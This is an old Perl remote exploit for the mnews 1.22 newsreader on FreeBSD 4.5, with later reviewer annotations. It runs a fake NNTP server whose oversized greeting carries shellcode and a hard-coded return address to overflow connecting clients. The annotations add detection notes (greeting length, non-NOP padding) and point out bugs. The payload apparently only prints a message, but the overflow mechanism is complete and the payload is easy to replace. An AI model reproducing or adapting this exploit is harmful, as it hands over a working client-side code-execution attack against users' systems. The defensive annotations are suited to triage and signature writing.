#!/usr/bin/perl -w 
# 
# Remote FreeBSD exploit for the Mnews port version 1.22 which is shipped 
# with the 4.5-RELEASE ports collection. 
# 
# This exploit is pretty harmless as it only prints a small message to 
# stdout (NAI?). 
# 
# Written by zillion[at]safemode.org (!shit) 
# 
# http://www.safemode.org 
# http://www.snosoft.com 
#
# Review notes (what the script does, for anyone triaging it):
#   - It is a rogue NNTP *server*: it binds TCP/119 and answers every
#     client that connects with a "200 ..." greeting whose banner is a
#     770-byte blob (fill bytes + payload + a repeated 32-bit address).
#     The client (mnews) is the target; this script never connects out.
#   - Detection: a "200 " greeting line of roughly 775 bytes from a
#     server on port 119 is far beyond the 512-byte NNTP line limit
#     and is the distinctive artifact on the wire; the fill byte is
#     0x41 ("A") rather than 0x90, so NOP-sled signatures will not fire.
#   - Mitigation on the client side was an updated mnews port; the
#     hard-coded stack address below is specific to one build, so any
#     change in the client's memory layout makes the write miss.
#   - The script needs to bind a privileged port, does not enable
#     strict, and never checks that the listening socket was created
#     (see the note at the IO::Socket::INET call).

use IO::Socket; 

# Payload bytes delivered inside the greeting.  The tail of the string is
# plain ASCII (0x23 0x57 0x61 0x73 ... = "#Wassssuppppp !! ???#"), i.e.
# the message the header says gets printed.  The two int 0x80 calls with
# 0x04 and 0x01 in %al look like write(2) followed by exit(2) on FreeBSD,
# which is consistent with the "only prints a message" claim above, but
# that reading has not been verified by executing it.
$shellcode = 

        "\xeb\x21\x5e\x31\xc0\x31\xdb\xb3\x3c\x80\xeb\x32\x88\x1e\x88". 
        "\x5e\x14\x6a\x15\x56\x6a\x01\xb0\x04\x50\xcd\x80\x31\xc0\x50". 
        "\xb0\x01\x50\xcd\x80\xe8\xda\xff\xff\xff\x23\x57\x61\x73\x73". 
        "\x73\x73\x75\x70\x70\x70\x70\x70\x20\x21\x21\x20\x3f\x3f\x3f". 
        "\x23"; 

# normal \x90 nops don't work here.. 

# Fill byte for the padding region (0x41).  See the detection note above.
$nop = "A"; 
# Hard-coded guess of the stack address inside the target process.  There
# is no brute-force loop, so this single value must be right for the
# 4.5-RELEASE build of mnews 1.22; nothing else is attempted.
$esp = 0xbfbff65e; 
# Written as a string; Perl converts it to a number when it is added to
# $esp below.  Equivalent to -70.
$off = "-70"; 
# Length of padding + payload.  The loop below pads up to this size, then
# two 4-byte address words are appended, giving a 770-byte $buffer.
$size = 762; 

# Build the padding: ($size - length($shellcode)) fill bytes.  $buffer is
# never declared -- the script runs without "use strict", so it springs
# into existence as a package global on the first ".=".
for ($i = 0; $i < ($size - length($shellcode)); $i++) { 
    $buffer .= "$nop"; 
} 

$buffer .= $shellcode; 
# Return address appended twice.  pack('l') is a 32-bit signed integer in
# the host's native byte order, so this is only meaningful when the
# script runs on the same architecture/endianness as the target (i386).
$buffer .= pack('l', ($esp + $off)); 
$buffer .= pack('l', ($esp + $off)); 

# NOTE(review): the format string literal is broken across two source
# lines, so the printed message contains a hard newline between "size"
# and the number.  Presumably a line-wrap from the original posting;
# it is cosmetic and does not affect what is sent to the client.
printf("Starting to listen for incoming connections... buffer size 
%d\n",length($buffer)); 
print("The new return address: 0x", sprintf('%lx',($esp + $off)), "\n"); 

# Listening socket on the standard NNTP port.  Indirect-object "new"
# syntax; the result is not checked.  Binding 119 normally requires root,
# and if the bind fails $sock is undef and the accept() call below dies
# with "Can't call method accept on an undefined value" rather than with
# the underlying socket error ($@ / $! are not reported).
my $sock = new IO::Socket::INET ( 
                                 LocalPort => 119, 
                                 Proto => 'tcp', 
                                 Listen => 1, 
                                 Reuse => 1, 
                                ); 

# Serve every client the same way: brief pause, then a single NNTP-style
# greeting line ("200 " is the "posting allowed" status code) carrying the
# 770-byte $buffer, then another pause before the next accept().  The
# client handle is not closed explicitly; it is dropped when $cl is
# reassigned on the next iteration.
while($cl = $sock->accept()) { 

sleep 1; 
print $cl "200 $buffer\n"; 
sleep 3; 

} 
